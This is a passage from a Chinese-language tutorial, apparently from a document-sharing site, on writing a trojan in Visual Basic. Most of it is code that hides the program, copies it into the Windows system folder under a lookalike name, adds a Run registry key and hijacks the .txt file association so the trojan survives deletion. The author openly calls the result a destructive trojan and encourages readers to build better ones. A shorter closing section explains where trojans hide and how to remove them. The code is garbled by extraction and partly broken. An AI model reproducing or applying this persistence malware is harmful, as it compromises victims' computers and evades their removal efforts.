End Select End WithEnd Sub 好了到此我们已经实现功能了,但还不行,我们要它在背后运行。
这简单,在 Server中的 form_Load 事件中加入一句:me.hide。
好这下看不见了,但大家知道木马是一开机就自动运行了,这又是为什么,怎么实现的?把它加入到注册表的启动组中?对,不错,跟我来吧! 回到 Server 工程中的 modApi 中加入如下 API 函数:Public Declare Function RegOpenKey Lib quotadvapi32.dllquot Alias quotRegOpenKeyAquot ByVal hKey AsLong ByVal lpSubKey As String phkResult As Long As LongPublic Declare Function RegSetvalueEx Lib quotadvapi32.dllquot Alias quotRegSetvalueExAquot ByValhKey As Long ByVal lpvalueName As String ByVal Reserved As Long ByVal dwType As LonglpData As Any ByVal cbData As Long As LongPublic Declare Function RegCreateKey Lib quotadvapi32.dllquot Alias quotRegCreateKeyAquot ByVal hKeyAs Long ByVal lpSubKey As String phkResult As Long As LongPublic Const REG_BINARY 3Public Const REG_SZ 1Public Const HKEY_LOCAL_MACHINE ampH80000002Public Const HKEY_CLASSES_ROOT ampH80000000 写到注册表启动组中的过程。
Public Sub StartupGroup Dim sKey As String Dim result As Long Dim hKeyID As Long Dim sKeyVal As String sKey quotSystrsyquot 启动组中的键找一个与系统文件相近的。
sKeyVal quotC:/windows/system/systrsy.exequot 木马文件的路径,可以用 GetSystemDirectory来取得系统路径。
result RegOpenKeyHKEY_LOCAL_MACHINE _ quotSoftware/Microsoft/Windows/CurrentVersion/Runquot hKeyID If result 0 Then result RegSetvalueExhKeyID sKey 0amp REG_SZ sKeyVal LensKey 1 End IfEnd Sub 好,就这样简单地完成了。
但是,想过没有,如果不是很菜的鸟,到注册表中见一删,我们苦苦的心血不就白白地浪费了吗?不行, 还得想让他发现了删也删不掉。
请看下面的代码:Public Sub WriteToTxt Dim result As Long Dim hKeyID As Long Dim skey As String Dim skeyVal As String skey quottxtfile/shell/open/commandquot skeyVal quotC:/windows/system/txtView.exequot result RegOpenKeyHKEY_CLASSES_ROOT skeyVal hKeyID If result 0 Then result RegSetvalueExhKeyID skey 0amp REG_SZ skeyVal LenskeyVal 1 End IfEnd Sub 肯 定 不 少 朋 友 一 看 就 知 道 了 , 原 是 与 txt 文 件 进 行 关 联 , 一 点 也 不 错 , 但C:/windows/system/txtView.exe 是哪里来的,我们的木马是 C:/windows/system/systrsy.exe 呀。
这可是我们木马的分身了。
好,回到 Server 工程的 Server 窗体的 form_Load 中,加入如下代码:Dim sCurrentPath As String sSystemDir As StringsCurrentPath App.Path amp quot/quot amp App.EXEName amp quot.exequotsSystemDir “C:/windows/system”On Error Resume Next 复制文件成系统目录下的 Systrsy.exe FileCopy sCurrentPath sSystemDir amp quot/Systrsy.exequotOn Error Resume Next复制文件成系统目录下的 txtView.exeFileCopy sCurrentPath sSystemDir amp quot/txtView.exequot 调用Call startupGroupCall WriteToTxt判断程序是否下在运行If App.PrevInstance Then 如果已经运行就退出。
EndEnd If 好了,写到这里一个破坏性木马已经诞生了,我实验过还是比较好的一个,希望大家也能写一个好的木马,能突破冰河呵呵! 注意: 1、大家在处理端口是最好使用高端端口,否则会和一些常用端口发生冲突 2、在第一次使用 VB.NET 的最好看看有关的图书,可能你能写出一款超级木马也说你可以使用 API 函数 FindWindow 和 PostMessage 去寻找指定的窗口,并关闭它。
下面的例子教给你怎样找到并关掉一个 Caption 为“Caluclator”的程序。
Dim winHwnd As LongDim RetVal As LongwinHwnd FindWindowvbNullString quotCalculatorquotDebug.Print winHwndIf winHwnd ltgt 0 ThenRetVal PostMessagewinHwnd WM_CLOSE 0amp 0ampIf RetVal 0 ThenMsgBox quot置入消息错误!quotEnd IfElseMsgBox quotCalculator 没有打开!quotEnd If为了让以上的代码工作,你必须在模块文件中什么以下 API 函数:Declare Function FindWindow Lib quotuser32quot Alias _quotFindWindowAquot ByVal lpClassName As String _ByVal lpWindowName As String As LongDeclare Function PostMessage Lib quotuser32quot Alias _quotPostMessageAquot ByVal hwnd As Long ByVal wMsg As Long _ByVal wParam As Long lParam As Any As LongPublic Const WM_CLOSE ampH10网络是互联的,当你从中获取资源的同时,也要经受其中的考验,木马程序会修改并破坏电脑的系统和文件,除了安装杀毒软件(包括防火墙)外,还应该尽可能地掌握系统文件知识。
下面简单介绍一下木马的加载方式: 加载方式:定位于 System.ini 和 Win.ini 文件 System.ini位置 C:windows “shellexplorer.exe” boot项原始值配置: ,explorer.exe 是 Windows 的核心文件之一,每次系统启动时,都会自动加载。
“shellexplorer C:windowsxxx.exe”xxx.exe 假设一木马程序。
boot项修改后配置: Win.ini位置 C:windows windows项原始值配置: ; “load”“run”,一般情况下,等号后无启动加载项。
“load”和“run”后跟非系统、应用启动文件,而是一些你 windows项修改后配置:不熟悉的文件名。
解决办法: 执行“运行→msconfig” 将 命令, System.ini 文件和 Win.ini 文件中被修改的值改回原值,并将原木马程序删除。
若不能进入系统, 则在进入系统前按 “ShiftF5”进入 Command PromptOnly 方式,分别键入命令 edit system.ini 和 edit win.ini 进行修改。
加载方式:隐藏在注册表中(此方式最为隐蔽)。
注 意 以 下 注 册 表 项 : HKEY LOCALMACHINESoftwareclassesexefileshellopencommand 原始数值数据:quot1quot 被修改后的数值数据:C:systemxxx.exe quot1quot 原注册表项是运行可执行文件的格式,被修改后就变为每次运行可执行文件时都会先运行 C:systemxxx.exe 这个程序。
例如:开机后运行 QQ 主程序时,该 xxx.exe(木马程序)就先被加载了。
解决办法: 当通过防火墙得知某端口被监听,立即下线,检查注册表及系统文件是否被修改,找到木马程序,将其删除。
所谓“病从口入” 感染源还是在于加载了木马程序的服务器端。
目前,伪装可执行文件图标的方法很多,如:修改扩展名,将文件图标改为文件夹的图标等,并隐藏扩展名,因此接收邮件和下载软件时一定要小心。
许多木马程序的文件名很像系统文件名,造成用户对其没有把握,不敢随意删除,因此要不断增长自己的知识才可防备万一。
可以借助一些软件来狙击木马,如:The Cleaner、Trojan Remover 等。
建议经常去微软网站下载补丁包来修补系统;及时升级病毒库 ,BO 又称“特洛伊木马” 是在美国一次黑客技术讨论会上由一个黑客组织推出的。
它其实是一种客户机/服务器程序,其利用的原理就是:在本机直接启动运行的程序拥有与使用者相同的权限。
因此如果能够启动服务器端(即被攻击的计算机)的服务器程序,就可以使用相应的客户端工具客户程序直接控制它了。
下面来谈谈如何用 VB 来实
上一篇:
自动化操作轻松入门系列
下一篇:
计算机实践报告论文